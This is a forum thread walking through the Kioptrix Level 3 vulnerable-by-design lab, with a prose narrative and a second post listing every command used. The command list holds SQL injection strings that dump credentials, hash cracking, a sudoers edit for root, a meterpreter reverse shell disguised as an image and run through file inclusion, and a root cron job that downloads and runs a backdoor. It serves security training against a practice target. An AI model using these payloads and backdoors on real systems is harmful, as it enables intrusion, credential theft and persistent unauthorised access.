Results 1 to 2 of 2

Thread: [Video] Kioptrix - Level 3

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] Kioptrix - Level 3

    Watch video on-line:
    Download video:

    Brief Overview

    It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.

    The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.


    • Scanned network for the host (nmap)
    • Added IP address to the host file
    • Port scanned the host (unicornscan)
    • Banner grabbed the services running on the open ports (nmap)
    • Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)
    • Enumerated database (manual MySQL injection)
    • Reused credentials granting a remote shell
    • Poorly configured setting to escape privileges (Unprotected limited root access)
    • Uploaded and used a web backdoor (Meterpreter)
    • Automated MySQL Injection (SQLMap)
    • Alternative method to gain root as well as escaping privileges (Cron Job)

    What do I need?

    The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.

    Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).

    Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).

    The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".

    One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.

    After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".

    When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.

    The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".

    A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.

    After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.

    With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...

    Game over
    Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.
    By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.

    (Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)
    The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.

    After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.

    Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.

    Game over...again
    Last edited by g0tmi1k; 08-12-2011 at 11:30 AM.

  2. #2
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Default Re: [Video] Kioptrix - Level 3

    nmap 192.168.0.* -n -sn -sP
    echo >> /etc/hosts   # It's in the readme
    cat /etc/hosts
    us -H -msf -Iv -p 1-65535 && us -H -mU -Iv -p 1-65535
    nmap -p 1-65535 -T4 -A -v
    firefox   # Link-> Blog
    # Gallery --> Source code (gadmin):
    cd /pentest/exploits/exploitdb
    grep -i gallarific files.csv
    cat platforms/php/webapps/15891.txt
    firefox and 1=2 union select 1,2,3,4,5,6 and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6 and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6
    echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d0  9794d8f021f40f0e" >> /tmp/hashes
    cd /pentest/passwords/john
    ./john /tmp/hash --format=raw-md5
    ssh   # starwars
    ls -lA
    cat CompanyPolicy.README
    ls -lh /etc/sudoers
    cat /etc/sudoers
    sudo ht   # starwars   File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save
    sudo su   # starwars
    id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
    cd /etc/apache2/sites-enabled
    cat * | grep -i documentroot
    firefox and 1=2 union select 1,2,3,4,5,6 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6 and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6
    cd /pentest/database/sqlmap
    ./ -u "" -f -b --current-user --is-dba --dbs
    ./ -u "" --columns
    ./ -u "" --users --passwords
    ./ -u "" --file-read="/etc/passwd"
    ./ -u "" --dump    # admin n0t7t1k4   Upload new pic
    cd /pentest/backdoors/web/webshells
    ls -lAh
    msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > /tmp/evil.jpg    # msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=443 R
    msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST= LPORT=443 E
    su loneferret
    echo "import pty; pty.spawn('/bin/bash')" > /tmp/
    python /tmp/
    su loneferret   # starwars
    sudo su    # starwars
    cd ~
    cat Congrats.txt
    ssh   # starwars
    cat CompanyPolicy.README
    sudo ht
    * * * * * root cd /tmp; wget && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit   # /etc/cron.d/exploit
    msfpayload linux/x86/shell_reverse_tcp LHOST= LPORT=443 X > /var/www/back.door
    file /var/www/back.door
    /etc/init.d/apache2 start
    msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST= LPORT=443 E
    uname -a

    • Editing the host file is mentioned in the README which is included (as well as on the blog post).

    Song: Strobot (Netsky Remix) - Shameboy & Wild Life (Nu:Tone remix) - Unicorn Kid & September (Rmx for Future Prophecies) - Camo & Krooked
    Video length: 14:47
    Capture length: 51:13
    Blog Post: g0tmi1k: [Video] Kioptrix - Level 3
    Forum Post:[video]-kioptrix-level-3-a.html#post204586

    Last edited by g0tmi1k; 08-12-2011 at 11:29 AM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Kioptrix - Level 1 (Samba)
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 03-23-2011, 10:16 PM
  2. [Video] Kioptrix - Level 1 (mod_ssl)
    By g0tmi1k in forum BackTrack Videos
    Replies: 2
    Last Post: 03-06-2011, 11:49 PM
  3. [Video] v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  4. [Video] Kioptrix - Level 2 (Injection)
    By g0tmi1k in forum BackTrack Videos
    Replies: 1
    Last Post: 03-05-2011, 11:47 AM
  5. [Video] v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts